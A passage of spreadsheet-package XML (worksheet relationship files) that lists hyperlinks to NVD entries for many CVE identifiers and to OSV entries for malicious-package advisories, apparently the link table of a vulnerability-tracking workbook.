Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89502" TargetMode="External" Id="rId997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89505" TargetMode="External" Id="rId998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89506" TargetMode="External" Id="rId999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89509" TargetMode="External" Id="rId1000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89512" TargetMode="External" Id="rId1001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89514" TargetMode="External" Id="rId1002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89515" TargetMode="External" Id="rId1003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89516" TargetMode="External" Id="rId1004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89517" TargetMode="External" Id="rId1005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89518" TargetMode="External" Id="rId1006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89519" TargetMode="External" Id="rId1007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89525" TargetMode="External" Id="rId1008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89527" TargetMode="External" Id="rId1009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89529" TargetMode="External" Id="rId1010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89531" TargetMode="External" Id="rId1011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89539" TargetMode="External" Id="rId1012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89543" TargetMode="External" Id="rId1013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89552" TargetMode="External" Id="rId1014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89556" TargetMode="External" Id="rId1015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89565" TargetMode="External" Id="rId1016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89566" TargetMode="External" Id="rId1017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89567" TargetMode="External" Id="rId1018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89568" TargetMode="External" Id="rId1019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89572" TargetMode="External" Id="rId1020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89575" TargetMode="External" Id="rId1021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89576" TargetMode="External" Id="rId1022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89577" TargetMode="External" Id="rId1023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89578" TargetMode="External" Id="rId1024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89582" TargetMode="External" Id="rId1025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89589" TargetMode="External" Id="rId1026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89590" TargetMode="External" Id="rId1027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89591" TargetMode="External" Id="rId1028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89592" TargetMode="External" Id="rId1029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89595" TargetMode="External" Id="rId1030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89598" TargetMode="External" Id="rId1031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89604" TargetMode="External" Id="rId1032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89618" TargetMode="External" Id="rId1033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89621" TargetMode="External" Id="rId1034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89623" TargetMode="External" Id="rId1035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89625" TargetMode="External" Id="rId1036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89627" TargetMode="External" Id="rId1037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89628" TargetMode="External" Id="rId1038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89629" TargetMode="External" Id="rId1039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89642" TargetMode="External" Id="rId1040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89644" TargetMode="External" Id="rId1041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89645" TargetMode="External" Id="rId1042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89661" TargetMode="External" Id="rId1043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89666" TargetMode="External" Id="rId1044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89673" TargetMode="External" Id="rId1045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89683" TargetMode="External" Id="rId1046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89693" TargetMode="External" Id="rId1047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89694" TargetMode="External" Id="rId1048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89698" TargetMode="External" Id="rId1049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89700" TargetMode="External" Id="rId1050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89701" TargetMode="External" Id="rId1051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89710" TargetMode="External" Id="rId1052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89714" TargetMode="External" Id="rId1053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89715" TargetMode="External" Id="rId1054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89716" TargetMode="External" Id="rId1055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89717" TargetMode="External" Id="rId1056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89718" TargetMode="External" Id="rId1057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89719" TargetMode="External" Id="rId1058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89721" TargetMode="External" Id="rId1059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89722" TargetMode="External" Id="rId1060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89726" TargetMode="External" Id="rId1061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89727" TargetMode="External" Id="rId1062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89728" TargetMode="External" Id="rId1063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89730" TargetMode="External" Id="rId1064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89732" TargetMode="External" Id="rId1065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89734" TargetMode="External" Id="rId1066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89735" TargetMode="External" Id="rId1067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89737" TargetMode="External" Id="rId1068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89739" TargetMode="External" Id="rId1069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89740" TargetMode="External" Id="rId1070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89745" TargetMode="External" Id="rId1071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89749" TargetMode="External" Id="rId1072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89751" TargetMode="External" Id="rId1073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89752" TargetMode="External" Id="rId1074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89753" TargetMode="External" Id="rId1075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89756" TargetMode="External" Id="rId1076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89757" TargetMode="External" Id="rId1077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89759" TargetMode="External" Id="rId1078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89765" TargetMode="External" Id="rId1079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89766" TargetMode="External" Id="rId1080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89768" TargetMode="External" Id="rId1081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89770" TargetMode="External" Id="rId1082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89772" TargetMode="External" Id="rId1083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89773" TargetMode="External" Id="rId1084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16139" TargetMode="External" Id="rId1085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16126" TargetMode="External" Id="rId1086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16127" TargetMode="External" Id="rId1087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16128" TargetMode="External" Id="rId1088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16129" TargetMode="External" Id="rId1089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16130" TargetMode="External" Id="rId1090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16131" TargetMode="External" Id="rId1091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16132" TargetMode="External" Id="rId1092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16133" TargetMode="External" Id="rId1093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16134" TargetMode="External" Id="rId1094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16135" TargetMode="External" Id="rId1095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16136" TargetMode="External" Id="rId1096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16137" TargetMode="External" Id="rId1097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16138" TargetMode="External" Id="rId1098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16140" TargetMode="External" Id="rId1099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-16141" TargetMode="External" Id="rId1100" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet3.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42016" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42018" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76460" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76461" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84869" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85706" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87886" TargetMode="External" Id="rId10" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet4.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86060" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58704" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67277" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14560" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80462" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82004" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87985" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87986" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87987" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87988" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19232" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65646" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66897" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14559" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14563" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21095" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21096" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52630" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53952" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62103" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62105" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63073" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69431" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71644" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77089" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77098" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78445" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79395" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79396" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79689" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79941" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80172" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80926" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80976" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80980" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80981" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80986" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81002" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82617" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84390" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86793" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-8778" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89478" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89479" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89482" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89485" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89492" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89494" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89495" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89526" 